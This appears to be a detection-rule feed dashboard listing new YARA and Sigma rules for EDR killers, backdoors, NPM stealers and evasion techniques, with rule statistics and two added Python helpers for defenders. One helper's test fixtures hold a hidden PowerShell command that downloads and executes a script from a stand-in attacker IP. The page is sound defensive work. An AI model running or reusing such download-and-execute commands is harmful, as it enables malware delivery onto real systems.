currently serving 23609 YARA rules and 4421 Sigma rules

New Rules per Day

Newest YARA Rules

This table shows the newest additions to the YARA rule set

Rule | Description | Date
SUSP_WIN_SchTask_QEMU_Port_Fwd_Indicators_Feb26 | Detects suspicious scheduled task XML files with QEMU port forwarding indicators, which could be used for malicious purposes such as setting up reverse tunnels or C2 communication channels | 09.02.2026
MAL_Macro_RedKitten_Feb26 | Detects a malicious VBA macro used in the RedKitten campaign | 09.02.2026
SUSP_B64_Encoded_AppDomainManager_Config_Feb26 | Detects Base64 encoded .NET application configuration files used to instantiate the AppDomainManager class | 09.02.2026
SUSP_B64_Encoded_AppDomainManager_CS_Feb26 | Detects Base64 encoded C# code overriding the AppDomainManager | 09.02.2026
SUSP_NPM_SupplyChain_Attack_C2_Feb26 | Detects pre- and postinstall scripts in combination with cloud services frequently abused as C2s | 09.02.2026
SUSP_NPM_Device_Fingerprinting_Feb26 | Detects suspicious device fingerprinting functionality | 09.02.2026
SUSP_NPM_Terminal_Output_Persistence_Feb26 | Detects suspicious terminal output persistence to bypass NPM buffering | 09.02.2026
MAL_NPM_GitHub_Identity_Stealer_Feb26 | Detects a malicious GitHub identity stealer | 09.02.2026
HKTL_Unknown_C2_Stager_Feb26 | Detects an unknown C2 stager | 07.02.2026
HKTL_KillEDR_Feb26_1 | Detects unknown EDR killer tools | 07.02.2026
HKTL_SharpEDRChecker_Feb26_1 | Detects SharpEDRChecker, a tool that checks for the presence of known defensive products such as AV and EDRs | 07.02.2026
HKTL_Novel_EDR_Evasion_Feb26 | Detects unknown EDR killer tools | 07.02.2026
HKTL_KillEDR_Feb26_2 | Detects unknown EDR killer tools | 07.02.2026
HKTL_KillEDR_Feb26_3 | Detects unknown EDR killer tools | 07.02.2026
MAL_NET_RedKitten_SloppyMio_Feb26 | Detects a .NET based RAT implant observed in use by Iranian threat actors. The implant abuses the legitimate AppVStreamingUX binary to sideload itself. | 06.02.2026
SUSP_KALI_IMAGE_Feb26 | Detects Kali Linux images or installation media, which might be used to perform attacks from virtual machines. | 05.02.2026
SUSP_AntiRootkit_Keywords_Feb26 | Detects suspicious keywords related to debuggers and anti-rootkit tooling, which may be used to evade detection. | 05.02.2026
MAL_DKnife_Downloader_Feb26 | Detects the DKnife downloader/updater for Linux and Android. | 05.02.2026
MAL_DKnife_Gateway_Monitoring_Framework_Feb26 | Detects the DKnife gateway monitoring framework. | 05.02.2026
MAL_DKnife_Configuration_Files_Feb26 | Detects DKnife configuration files. | 05.02.2026
MAL_Dknife_VPN_Client_HA_PROXY_Feb26 | Detects the DKnife network components: a customized N2N (P2P VPN) client used to contact the C2 (remote.bin), a reverse proxy module modified from HAProxy (sslmm.bin), a labelling and relay component (postapi.bin), a bridged TAP interface (yitiji.bin) and the updater (dkupdate) | 05.02.2026
MAL_DKnife_Archive_Feb26 | Detects the DKnife update archive. | 05.02.2026
SUSP_Base64_Encoded_IP_Feb26 | Detects suspicious HTTP requests with base64 encoded IP addresses, which could indicate a hard-coded, obfuscated IP address in a script or binary, e.g. for C&C communication. | 04.02.2026
MAL_MACOS_Phishing_Dropper_Feb26 | Detects an Apple Disk Image containing a malicious dropper script that executes further payloads. Actors often use phishing lures to make the victim unknowingly execute the code. | 03.02.2026
MAL_POC_Microsoft_Warbird_Loader_Feb26 | Detects a PoC that turns Microsoft Warbird into a shellcode loader | 03.02.2026
MAL_LNX_Stealth_Persistence_Framework_Feb26 | Detects the Stealth Persistence Framework on Linux systems, which is used for maintaining unauthorized access. | 02.02.2026
MAL_Chrysalis_DllLoader_Feb26 | Detects the DLL used to load the Chrysalis backdoor, seen in the compromise of the infrastructure hosting Notepad++ by the Chinese APT group Lotus Blossom | 02.02.2026
MAL_Chrysalis_Shellcode_Loader_Feb26 | Detects the shellcode used to load the Chrysalis backdoor, seen in the compromise of the infrastructure hosting Notepad++ by the Chinese APT group Lotus Blossom | 02.02.2026
MAL_Chrysalis_Backdoor_Feb26 | Detects the Chrysalis backdoor, seen in the compromise of the infrastructure hosting Notepad++ by the Chinese APT group Lotus Blossom | 02.02.2026
MAL_CobaltStrike_Beacon_Loader_Feb26 | Detects a Cobalt Strike beacon loader | 02.02.2026

Successful YARA Rules in Set

This table lists the rules whose matched samples have the lowest average AV detection rates (rules created in the last 12 months, matches from the last 14 days; the rate is the average number of VirusTotal engines flagging the matched samples)

Rule | Average AV detection rate | Sample count
MAL_GuLoader_Shellcode_Oct22_3 | 0.0 | 20
SUSP_MAL_EXFIL_Stealer_Output_Characteristics_Sep22_1 | 0.04 | 180
SUSP_PY_OBFUSC_Berserker_Indicators_Dec22_1 | 0.21 | 14
SUSP_BAT_OBFUSC_Apr23_2 | 0.59 | 64
SUSP_Encrypted_ZIP_Suspicious_Contents_Jul23_1_File | 0.64 | 11
SUSP_PUA_RustDesk_Apr23_1 | 0.68 | 22
SUSP_BAT_PS1_Combo_Jan23_2 | 0.71 | 45
SUSP_JS_OBFUSC_Feb23_2 | 1.04 | 1736
SUSP_WEvtUtil_ClearLogs_Sep22_1 | 1.12 | 43
SUSP_CryptBase_PE_Info_NOT_Cryptbase_Feb23 | 1.19 | 21
SUSP_OBFUSC_PY_Loader_Jun23_1 | 1.48 | 21
SUSP_Webshell_OBFUSC_Indicators_Aug22_1 | 2.07 | 14
SUSP_URL_Split_Jun23 | 2.5 | 18
SUSP_OBFUSC_JS_Atob_Anomalies_Feb23 | 2.69 | 13
PUA_RuskDesk_Remote_Desktop_Jun23_1 | 2.78 | 18
SUSP_JS_Redirector_Mar23 | 2.81 | 108
SUSP_JS_Executing_Powershell_Apr23 | 3.14 | 274
SUSP_PY_Reverse_Shell_Indicators_Jan23_1 | 3.25 | 16
SUSP_OBFUSC_JS_Execute_Base64_Mar23 | 3.26 | 34
SUSP_Encoded_Registry_Key_Paths_Sep22_1 | 3.39 | 64
SUSP_PE_OK_RU_URL_Jun23 | 3.59 | 17
HKTL_Clash_Tunneling_Tool_Aug22_2 | 3.75 | 16
SUSP_PY_OBFUSC_Hyperion_Aug22_1 | 4.0 | 13
SUSP_BAT_OBFUSC_Apr23_1 | 4.0 | 16
SUSP_RANSOM_Note_Aug22 | 4.01 | 171
SUSP_OBFUSC_JS_Atob_Anomalies_Feb23_2 | 4.52 | 67
SUSP_BAT_PS1_Contents_Jan23_1 | 5.11 | 18
SUSP_OBFUSC_PS1_FormatStrings_Dec22_1 | 5.33 | 12
SUSP_BAT_OBFUSC_Apr23_4 | 5.35 | 26
SUSP_OBFUSC_BAT_Dec22_1 | 5.84 | 31

Latest YARA Matches with Low AV Detection Rate

This table lists the last matches with low AV detection rates (between 0 and 15 AV engines matched)

Rule | AV engines | SHA-256
SUSP_OBFUSC_Base64_Hex_Encoded_Apr19 | 8 | 62e1d86212cf8d494c8ea9da79318408de06dfdb6ea5bda95f48a95f74e9ef74
SUSP_B64_Atob_Aug23 | 8 | 62e1d86212cf8d494c8ea9da79318408de06dfdb6ea5bda95f48a95f74e9ef74
SUSP_B64_Atob_Aug23 | 14 | dbe77120a7efa8306632da669d2c4e1092cc8ebde0c17f7f25152c341fd2de6a
SUSP_OBFUSC_Base64_Hex_Encoded_Apr19 | 14 | dbe77120a7efa8306632da669d2c4e1092cc8ebde0c17f7f25152c341fd2de6a
SUSP_FilePath_AppData_Oct21_1 | 1 | 754d0f86051bfbc4f8f9e70c114468eea609c3d46df9335df871d141d4612b09
SUSP_PS2EXE_PowerShell2Exe_2 | 8 | 17e7ed0e9fa072df926c74d001533cf04b93e197a2498fa1b2d24ba4161294e7
HKTL_Ladpdomaindump_Bloodhound_Feb19 | 1 | a20584f679227feb8f8c3b9414ed92a45ba7cb9e1d761ad769c0d3aeb81e141e
SUSP_Encoded_PS_W_Hidden | 1 | 83349c6487e28f0e5e73b160dc71b8ca97388f22806f6dbb0562aa5297090928
SUSP_Encoded_PS_W_Hidden_Ext1 | 1 | 83349c6487e28f0e5e73b160dc71b8ca97388f22806f6dbb0562aa5297090928
SUSP_Encoded_PS_EP_Bypass | 1 | 83349c6487e28f0e5e73b160dc71b8ca97388f22806f6dbb0562aa5297090928
SUSP_PS1_Encoded_Nested_Commands_Jun25 | 1 | 83349c6487e28f0e5e73b160dc71b8ca97388f22806f6dbb0562aa5297090928
HKTL_PS1_Villain_C2_Implant_Apr23_1 | 11 | 6502d6dc7442d493674056dc7c13391c54ac1fdf62b5d5befa3752c7bc0bcd64
SUSP_LNX_RevShell_Payloads_Jun21_1 | 11 | 6502d6dc7442d493674056dc7c13391c54ac1fdf62b5d5befa3752c7bc0bcd64
SUSP_PS1_Small_NetworkFunc_Jun22_1 | 11 | 6502d6dc7442d493674056dc7c13391c54ac1fdf62b5d5befa3752c7bc0bcd64
HKTL_Disable_Tamper_Protection_Jul24 | 6 | baeb4bebd830cdddf47946a0e2a200f94b52bf226d90f71ebe5e6feb8d767abc
SUSP_MSIL_NET_ConfuserEx_Module_Encryption_Sep23 | 2 | 60d32559b89f2e66d2b125fbccf157175c49ba8fec906e5d7965f6ef77fc2d5d
SUSP_OBFUSC_Base64_Hex_Encoded_Apr19 | 8 | 4fde193ad03c6ea2659743a704b72ec3cadeb59ba59aabcbee45d666602b7eec
SUSP_B64_Atob_Aug23 | 8 | 4fde193ad03c6ea2659743a704b72ec3cadeb59ba59aabcbee45d666602b7eec
SUSP_PyInstaller_Gen_Pattern_Feb25 | 7 | a61efc946e96c6f073a33ff92f51c41e9699c0a07bf07fcff6e26eb7c45d3fbb
SUSP_FilePath_AppData_Oct21_1 | 2 | 1b68e13362c7743e17d2c4c8575f90f3031372e33f8fb7a6e968cee6790da82c

YARA Rules Per Category

This list shows the number of YARA rules in the subscribable categories (the categories overlap, as a rule can belong to several categories)

Tag | Count
Malware | 7438
Threat Hunting (not subscribable, only in THOR scanner) | 5777
APT | 5043
Hacktools | 4809
Webshells | 2397
Exploits | 713

Newest Sigma Rules

This table shows the newest additions to the Sigma rule set

Rule | Description | Date
File Operation via .NET Class | Detects the use of .NET class methods in command lines, which could be used for unauthorized file operations such as copying files. Since Windows offers many common ways to copy files, an adversary may use this rarely used method to avoid detection. | 06.02.2026
Suspicious Linux Command Patterns | Detects suspicious command line patterns that may indicate malicious activity, such as decoding base64 content to a file in some folder and executing it. | 05.02.2026
Suspicious Download and Execution Combo in Linux | Detects suspicious command line patterns where a download utility is executed in combination with other suspicious command line utilities. This could indicate malicious activity such as downloading a file and then decoding it, changing its permissions, executing it or creating persistence. | 05.02.2026
Suspicious Double Extension File Execution on Linux | Detects suspicious use of executable extensions like .sh, .py or .pl after a non-executable file extension to disguise malicious files in Linux environments | 05.02.2026
Suspicious Double Extension Files in Linux | Detects files with double extensions on Linux systems, which could be an attempt to disguise executable content as harmless documents. | 05.02.2026
Suspicious Base64 Encoded IP in PowerShell Execution | Detects PowerShell script blocks that contain base64-encoded IP addresses, a technique commonly used for obfuscation and defense evasion. Threat actors may use it to download and execute secondary payloads from IP addresses, often their command and control (C2) servers or other malicious infrastructure. By base64-encoding these URLs within PowerShell commands, adversaries attempt to bypass detection mechanisms and evade user scrutiny. Retrieving content from an IP address given as a base64-encoded string is rarely seen in legitimate software. | 04.02.2026
Suspicious Base64 Encoded IP in Command Line | Detects processes with command lines containing base64-encoded IP addresses, which may indicate obfuscation or evasion attempts. Threat actors often host their secondary payloads on bare IP addresses (C&C servers or other hosting infrastructure), and a dropper downloads and executes the secondary payload from there. To hide the command line from user scrutiny, the script or command line arguments that perform the download and execution may be base64-encoded. | 04.02.2026
Renamed TinyCC (TCC) Compiler Execution | Detects the execution of a renamed TinyCC (TCC) compiler (tcc.exe). Attackers have been observed renaming tcc.exe to masquerade as legitimate Windows binaries (e.g., svchost.exe) to compile and execute malicious C code in memory, such as shellcode loaders. This technique was observed in Chrysalis backdoor attacks. | 03.02.2026
Suspicious Child Process of Notepad++ Updater - GUP.Exe | Detects suspicious child process creation by the Notepad++ updater process (gup.exe). This could indicate exploitation of the updater component to deliver malware. | 03.02.2026
Uncommon File Created by Notepad++ Updater Gup.EXE | Detects the Notepad++ updater (gup.exe) creating files in suspicious or uncommon locations. This could indicate exploitation of the updater component to deliver malware or other unwanted files. | 03.02.2026
Tiny C Compiler Runtime Execution | Detects execution of the Tiny C Compiler (TCC), which compiles and executes C code directly in memory. This technique was observed in Chrysalis backdoor campaigns, where attackers renamed tcc.exe to svchost.exe and used it to load shellcode from .c files directly into memory, bypassing traditional detection methods. | 03.02.2026
Notepad++ Updater DNS Query to Uncommon Domains | Detects the Notepad++ updater (gup.exe) making DNS queries to domains that are not part of the known legitimate update infrastructure. This could indicate exploitation of the updater mechanism or suspicious network activity that warrants further investigation. | 02.02.2026
CLSID DefaultIcon Value Tampering | Detects potential COM object hijacking. Adversaries have used the CLSID DefaultIcon value to reference malicious or encrypted payloads, or to conceal payload execution paths, as part of defense evasion and persistence chains. | 31.01.2026
Suspicious PowerShell Execution with Public IPv4 | Detects PowerShell making web requests directly to public IPv4 addresses using Invoke-WebRequest or Invoke-RestMethod, which may indicate suspicious activity. Threat actors may use this technique to download and execute secondary payloads from bare IP addresses, potentially their command and control (C2) servers or other malicious infrastructure. | 29.01.2026
Win32_ScheduledJob Class or At.exe Enabled - Registry | Detects the enabling of the Win32_ScheduledJob WMI class or At.exe via registry modification. The Win32_ScheduledJob class is used to create and manage scheduled jobs in Windows. This class is disabled by default for security reasons, and enabling it may indicate an attempt to create or manage scheduled jobs in a potentially malicious manner. | 29.01.2026
Suspicious Modification of Service ImagePath for ClipUp Defender Evasion | Detects registry modifications that set the ImagePath of a service to execute ClipUp.exe with Protected Process Light (PPL) parameters targeting Windows Defender locations. This technique is used by attackers to replace the Windows Defender service executable before it initializes, effectively bypassing security protections. The approach leverages CreateProcessAsPPL.exe to obtain PPL privileges, which normally protect security software from tampering. | 29.01.2026
Suspicious File Creation by Clipup in Windows Defender Directory | Detects file creation by ClipUp.exe in the Windows Defender program files directory. ClipUp.exe may be used to overwrite the service executable of Windows Defender, potentially allowing an attacker to disable or manipulate Windows Defender. | 29.01.2026
Suspicious PowerShell Execution with Public IPv4 - PowerShell | Detects PowerShell commands or scripts making web requests directly to public IPv4 addresses using `Invoke-WebRequest` or `Invoke-RestMethod`, which may indicate suspicious activity. Threat actors may use this technique to download and execute secondary payloads from bare IP addresses, potentially their command and control (C2) servers or other malicious infrastructure. | 29.01.2026
Win32_ScheduledJob Class or At.exe Enabled - Process | Detects the enabling of the Win32_ScheduledJob WMI class or At.exe via registry modification. The Win32_ScheduledJob class is used to create and manage scheduled jobs in Windows. This class is disabled by default for security reasons, and enabling it may indicate an attempt to create or manage scheduled jobs in a potentially malicious manner. | 29.01.2026
Windows Defender Critical Binary Deletion | Detects the deletion of critical Windows Defender binaries, which could indicate an attempt to disable or manipulate Windows Defender. | 29.01.2026
Suspicious ClipUp Execution with Windows Defender Path | Detects suspicious execution of ClipUp.exe with parameters that may indicate an attempt to write to Windows Defender protected locations. ClipUp.exe may be used to overwrite the service executable of Windows Defender, potentially allowing an attacker to disable or manipulate Windows Defender. | 29.01.2026
Windows Defender Folder Invocation Through Short Name | Detects suspicious command line patterns where a process invokes a path within the Windows Defender folder using its short name (8.3 notation). This technique may be used to execute or manipulate Windows Defender binaries while evading detection mechanisms that do not account for short path names. | 29.01.2026
Suspicious Driver Service Installation | Detects attempts to install a suspicious driver service using the 'sc.exe' command. Adversaries have been observed using this technique to install malicious or vulnerable drivers to bypass or disrupt security solutions such as EDRs. It is often combined with other techniques to establish persistence and maintain control over the compromised system. | 27.01.2026
Potentially Suspicious Usage of Win32 ScheduledJob WMI Class | Detects potential abuse of the Win32_ScheduledJob WMI class for creating or removing scheduled jobs. This WMI class, which is disabled by default for security reasons, manages AT.exe command-based scheduled jobs. Threat actors can exploit this class to execute malicious code at predetermined times or remove jobs to evade detection. The use of this WMI class instead of conventional scheduling methods may indicate suspicious activity. | 27.01.2026
Driver Service Configuration Changed to Kernel Mode | Detects attempts to modify a driver's service configuration to kernel mode using the 'sc config' command. An attacker can use sc.exe to change the service type of a driver so that it runs in kernel mode, which attackers typically do in order to gain deeper system control and disable security services such as antivirus protection. | 27.01.2026
Suspicious Driver Service Installation - Security | Detects installations of driver services from unusual directories that may indicate malicious activity. Adversaries often deploy rogue or compromised drivers to evade security measures (like EDR/AV), obtain kernel-level access, or extract sensitive data like LSASS memory. This approach has become increasingly prevalent among ransomware operators and other malicious actors. | 27.01.2026
Suspicious Driver Service Installation - System | Detects driver service installations from suspicious locations, indicating potential malware activity. Threat actors may install malicious or vulnerable drivers for various purposes, such as bypassing security products (EDR/AV) or gaining kernel access to dump LSASS. This technique is very commonly used in security product bypass attempts and is nowadays commonly used by ransomware groups. | 27.01.2026
Potentially Suspicious PyInstaller Executable | Detects execution of potentially suspicious PyInstaller executables that have been packaged with Python code which may include malicious payloads. PyInstaller is a popular tool for packaging Python applications into standalone executables, but it can also be used by adversaries to wrap and obfuscate malicious Python code in a single executable file. | 27.01.2026
Velociraptor Abuse via Suspicious PowerShell Commands | Detects Velociraptor.exe being abused to execute suspicious PowerShell or command-line activity indicative of post-exploitation behavior. | 27.01.2026
Suspicious Velociraptor Spwaned Processes | Detects suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attacks. | 27.01.2026
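The YARA rule SUSP_Base64_Encoded_IP_Feb26 and the two Sigma rules for base64-encoded IPs above describe the same evasion: the C2 address never appears as a dotted quad in the command line. The code below is an added example, not the logic of those rules, showing the two ways a detector can deal with it. `find_base64_ips` decodes every base64-looking token (as UTF-8 and as the UTF-16LE that PowerShell's `-EncodedCommand` uses) and reports public IPv4 addresses found inside; `base64_offsets` shows the trick a static rule needs when it cannot decode: the three fixed substrings that a plaintext produces depending on its alignment within base64's 3-byte groups. The command lines are constructed samples with documentation-range IPs; the RFC 1918 filter is an assumption to cut admin-script noise.

```python
import base64
import binascii
import re
from typing import List

# Long runs of the base64 alphabet, with optional padding, inside a command line.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Dotted quad not glued to further digits or dots; the octet range is checked separately.
IPV4 = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def _public_v4(ip: str) -> bool:
    """Syntactically valid and outside loopback, link-local and RFC 1918 space.
    (ipaddress.is_global would also reject the documentation ranges used in the samples.)"""
    o = [int(x) for x in ip.split(".")]
    if max(o) > 255:
        return False
    a, b = o[0], o[1]
    return not (a in (10, 127) or (a == 169 and b == 254) or (a == 172 and 16 <= b <= 31) or (a == 192 and b == 168))


def _decodings(token: str) -> List[str]:
    """Decode a token as UTF-8 and as UTF-16LE (PowerShell -EncodedCommand is UTF-16LE)."""
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
    except (binascii.Error, ValueError):
        return []
    return [raw.decode("utf-8", "ignore"), raw.decode("utf-16le", "ignore")]


def find_base64_ips(cmdline: str) -> List[str]:
    """Public IPv4 addresses hidden inside base64 tokens of a command line, in order of appearance."""
    found: List[str] = []
    for token in B64_TOKEN.findall(cmdline):
        for text in _decodings(token):
            for ip in IPV4.findall(text):
                if _public_v4(ip) and ip not in found:
                    found.append(ip)
    return found


def base64_offsets(needle: bytes) -> List[str]:
    """The three substrings that appear verbatim in base64 output whenever `needle` starts at
    byte offset 0, 1 or 2 of a 3-byte group. A static rule (Sigma, YARA) cannot decode at
    match time, so it ORs these three variants instead."""
    variants = []
    for shift in range(3):
        enc = base64.b64encode(b"\x00" * shift + needle).decode()
        start = (0, 2, 3)[shift]                    # leading chars that depend on the unknown preceding bytes
        end = (0, 3, 2)[(len(needle) + shift) % 3]  # trailing chars (plus padding) that depend on what follows
        variants.append(enc[start:len(enc) - end])
    return variants


def _ps_encoded(script: str) -> str:
    return base64.b64encode(script.encode("utf-16le")).decode()


# Constructed sample command lines (not from the feed). 203.0.113.0/24 and 198.51.100.0/24
# are documentation ranges standing in for attacker hosts.
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -EncodedCommand "
    + _ps_encoded("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"),
    "cmd.exe /c loader.bat " + base64.b64encode(b"http://198.51.100.7:8443/x").decode(),
    # benign: a blob that decodes to binary, plus an internal IP in clear text
    "certutil.exe -decode " + base64.b64encode(bytes(range(32, 80))).decode() + " out.bin 192.168.1.20",
    # encoded RFC 1918 target, dropped as likely admin tooling
    "powershell.exe -EncodedCommand " + _ps_encoded("Invoke-WebRequest http://10.0.0.5/patch.msi"),
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(find_base64_ips(line), line[:60])
    print(base64_offsets(b"http://1"))
```

The decoding approach is what a log pipeline or a YARA external scanner can afford; the offset approach is what the Sigma rules have to rely on, and it only covers plaintext anchors such as `http://` followed by a digit, which is why a decoding stage on the SIEM side catches more and should flag the UTF-16LE case separately.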

YARA/SIGMA Rule Count

Rule type | Community feed | Nextron private feed
YARA | 2720 | 20889
Sigma | 3540 | 881

Sigma Rules Per Category (Community)

Type | Count
windows / process_creation | 1331
windows / registry_set | 219
windows / file_event | 206
windows / ps_script | 165
windows / security | 160
linux / process_creation | 131
windows / image_load | 114
webserver | 82
windows / system | 74
macos / process_creation | 68
aws / cloudtrail | 55
proxy | 54
windows / network_connection | 53
linux / auditd | 53
azure / activitylogs | 42
windows / registry_event | 40
azure / auditlogs | 38
windows / ps_module | 33
windows / application | 31
windows / dns_query | 27
windows / process_access | 25
azure / signinlogs | 24
okta / okta | 22
azure / riskdetection | 19
windows / pipe_created | 18
opencanary / application | 18
rpc_firewall / application | 17
windows / windefend | 16
github / audit | 16
linux | 16
gcp / gcp.audit | 16
bitbucket / audit | 14
linux / file_event | 13
m365 / threat_management | 13
windows / file_delete | 13
cisco / aaa | 12
windows / create_remote_thread | 12
windows / codeintegrity-operational | 10
windows / driver_load | 10
windows / registry_delete | 10
kubernetes / application / audit | 10
windows / ps_classic_start | 9
dns | 9
windows / create_stream_hash | 9
windows / appxdeployment-server | 9
windows / firewall-as | 8
windows / msexchange-management | 8
gcp / google_workspace.admin | 7
antivirus | 7
fortigate / event | 7
windows / file_access | 7
azure / pim | 7
windows / bits-client | 7
zeek / smb_files | 7
windows / dns-client | 6
zeek / dns | 5
linux / network_connection | 5
zeek / http | 5
jvm / application | 5
kubernetes / audit | 5
windows / sysmon | 4
windows / taskscheduler | 4
windows / iis-configuration | 4
zeek / dce_rpc | 4
m365 / audit | 3
macos / file_event | 3
windows / wmi_event | 3
windows / powershell-classic | 3
windows / ntlm | 3
windows / registry_add | 3
linux / sshd | 3
windows / dns-server | 2
apache | 2
spring / application | 2
onelogin / onelogin.events | 2
firewall | 2
linux / syslog | 2
windows / security-mitigations | 2
nodejs / application | 1
windows / microsoft-servicebus-client | 1
python / application | 1
windows / diagnosis-scripted | 1
windows / file_executable_detected | 1
windows / sysmon_error | 1
m365 / threat_detection | 1
zeek / rdp | 1
windows / smbclient-security | 1
windows / file_rename | 1
windows / sysmon_status | 1
ruby_on_rails / application | 1
m365 / exchange | 1
zeek / kerberos | 1
windows / terminalservices-localsessionmanager | 1
sql / application | 1
windows / driver-framework | 1
windows | 1
cisco / duo | 1
linux / sudo | 1
velocity / application | 1
cisco / ldp | 1
nginx | 1
windows / dns-server-analytic | 1
cisco / bgp | 1
windows / ldap | 1
windows / wmi | 1
windows / printservice-admin | 1
windows / lsa-server | 1
windows / ps_classic_provider_start | 1
windows / printservice-operational | 1
database | 1
linux / guacamole | 1
windows / appmodel-runtime | 1
django / application | 1
linux / auth | 1
linux / clamav | 1
fortios / sslvpnd | 1
juniper / bgp | 1
windows / applocker | 1
windows / openssh | 1
cisco / syslog | 1
linux / cron | 1
huawei / bgp | 1
windows / appxpackaging-om | 1
windows / smbclient-connectivity | 1
windows / smbserver-connectivity | 1
windows / process_tampering | 1
paloalto / file_event / globalprotect | 1
linux / vsftpd | 1
zeek / x509 | 1
windows / capi2 | 1
windows / shell-core | 1
windows / file_change | 1
windows / raw_access_thread | 1
paloalto / appliance / globalprotect | 1
windows / certificateservicesclient-lifecycle-system | 1

Sigma Rules Per Category (Nextron Private Feed)

Type | Count
windows / process_creation | 414
windows / ps_script | 81
windows / registry_set | 80
windows / file_event | 45
windows / image_load | 45
linux / process_creation | 41
windows / wmi | 29
windows / security | 25
proxy | 12
windows / system | 10
windows / registry_event | 8
windows / network_connection | 8
windows / kernel-event-tracing | 6
windows / ntfs | 5
windows / ps_module | 5
windows / registry_delete | 4
windows / create_remote_thread | 4
windows / pipe_created | 4
windows / sense | 4
windows / taskscheduler | 4
windows / hyper-v-worker | 3
windows / driver_load | 3
windows / ps_classic_script | 3
windows / vhd | 3
webserver | 3
windows / application-experience | 3
windows / bits-client | 2
windows / dns_query | 2
windows / codeintegrity-operational | 2
windows / file_delete | 2
linux / file_event | 2
windows / kernel-shimengine | 2
windows / file_access | 2
macos / process_creation | 2
windows / windefend | 2
windows / process_access | 2
windows / process-creation | 2
windows / firewall-as | 1
windows / registry-setinformation | 1
windows / application | 1
windows / file_rename | 1
windows / audit-cve | 1
dns | 1
windows / amsi | 1

Tenable Nessus

Requirement: Privileged Scan

  • YARA scanning with Nessus works only when scanning with credentials (privileged scan)
Tutorial: https://docs.tenable.com/nessus/Content/CredentialedChecksOnWindows.htm

YARA Scanning with Nessus

  • You can only upload a single .yar file
  • The filesystem scan has to be activated
  • You have to define the target locations
  • Matches are reported under Nessus plugin ID 91990
  • Only files with the following extensions can be scanned: .application, .asp, .aspx, .bat, .chm, .class, .cmd, .com, .cp, .csh, .dl, .doc, .docx, .drv, .exe, .gadget, .hta, .inf, .ins, .inx, .isu, .jar, .job, .jpeg, .jpg, .js, .jse, .jse, .jsp, .lnk, .msc, .msi, .msp, .mst, .paf, .pdf, .php, .pif, .ppt, .pptx, .ps1, .ps1xm, .ps2, .ps2xm, .psc1, .psc2, .reg, .rgs, .scf, .scr, .sct, .shb, .shs, .swf, .sys, .u3p, .vb, .vbe, .vbs, .vbscript, .ws, .wsf, .xls, .xls
Tutorial: https://de.tenable.com/blog/threat-hunting-with-yara-and-nessus
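Because Nessus accepts exactly one .yar file, a rule set that is maintained as several files with `include` directives has to be flattened before upload, and the result must still compile: yara refuses duplicate rule names and duplicate module imports have to be hoisted. The script below is an added helper written for this page, not a Nextron or Tenable tool. It inlines includes (relative to the including file), emits each `import` once at the top, keeps the first definition of a rule name and drops later duplicates. The sample rule tree it builds in a temporary directory is constructed for the demonstration and contains no Valhalla rules; header comments before a file's first rule are intentionally not carried over.

```python
import re
import tempfile
from pathlib import Path
from typing import List, Set

INCLUDE_RE = re.compile(r'^[ \t]*include[ \t]+"([^"]+)"[ \t]*$', re.MULTILINE)
IMPORT_RE = re.compile(r'^[ \t]*(import[ \t]+"[^"]+")[ \t]*$', re.MULTILINE)
RULE_RE = re.compile(r"^[ \t]*(?:private[ \t]+|global[ \t]+)*rule[ \t]+([A-Za-z_][A-Za-z0-9_]*)", re.MULTILINE)


def merge_yara(paths: List[Path]) -> str:
    """Flatten several .yar files (following their include chains) into one file.

    Module imports are hoisted to the top exactly once, includes are inlined ahead of
    the file that references them (so referenced rules are defined first), and a rule
    name seen a second time is dropped so that the single file still compiles.
    A line starting with "rule" inside a comment would be treated as a rule start;
    that is the price of not using a full YARA parser here.
    """
    imports: List[str] = []
    seen_rules: Set[str] = set()
    visited: Set[Path] = set()
    chunks: List[str] = []

    def ingest(path: Path) -> None:
        path = path.resolve()
        if path in visited:
            return                              # a file included twice is emitted once
        visited.add(path)
        text = path.read_text(encoding="utf-8")
        for inc in INCLUDE_RE.findall(text):
            ingest(path.parent / inc)           # include paths are relative to the including file
        for imp in IMPORT_RE.findall(text):
            if imp not in imports:
                imports.append(imp)
        text = INCLUDE_RE.sub("", IMPORT_RE.sub("", text))
        matches = list(RULE_RE.finditer(text))
        bounds = [m.start() for m in matches] + [len(text)]
        for m, begin, end in zip(matches, bounds, bounds[1:]):
            name = m.group(1)
            if name in seen_rules:
                continue                        # first definition wins
            seen_rules.add(name)
            chunks.append(text[begin:end].strip())

    for p in paths:
        ingest(Path(p))
    header = "\n".join(imports)
    return (header + "\n\n" if header else "") + "\n\n".join(chunks) + "\n"


def rule_names(yara_text: str) -> List[str]:
    return RULE_RE.findall(yara_text)


def build_sample_ruleset(directory: Path) -> List[Path]:
    """Write a small constructed rule tree (not Valhalla content) and return the two
    top-level files an analyst would otherwise have to upload separately."""
    (directory / "a.yar").write_text(
        'import "pe"\n\n'
        'rule Sample_A { strings: $s = "alpha" condition: $s }\n'
        'rule Sample_Dup { strings: $s = "dup-v1" condition: $s }\n')
    (directory / "c.yar").write_text(
        'rule Sample_C { strings: $s = "gamma" condition: $s }\n'
        'rule Sample_Dup { strings: $s = "dup-v2" condition: $s }\n')  # clashes with a.yar
    (directory / "b.yar").write_text(
        'include "c.yar"\n'
        'import "pe"\n\n'
        'private rule Sample_B { condition: pe.is_pe and Sample_C }\n')
    return [directory / "a.yar", directory / "b.yar"]


def demo_merge() -> str:
    with tempfile.TemporaryDirectory() as tmp:
        return merge_yara(build_sample_ruleset(Path(tmp)))


if __name__ == "__main__":
    print(demo_merge())
```

Run the merged output through `yara -w` (or `yarac`) once before uploading; a dropped duplicate is usually an older copy of the same rule, but if the two definitions differ the merge keeps whichever file you listed first, so order the paths accordingly.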

Carbon Black

Tutorial: https://github.com/carbonblack/cb-yara-connector

FireEye EX

Tutorial: https://www.fireeye.com/blog/products-and-services/2018/12/detect-and-block-email-threats-with-custom-yara-rules.html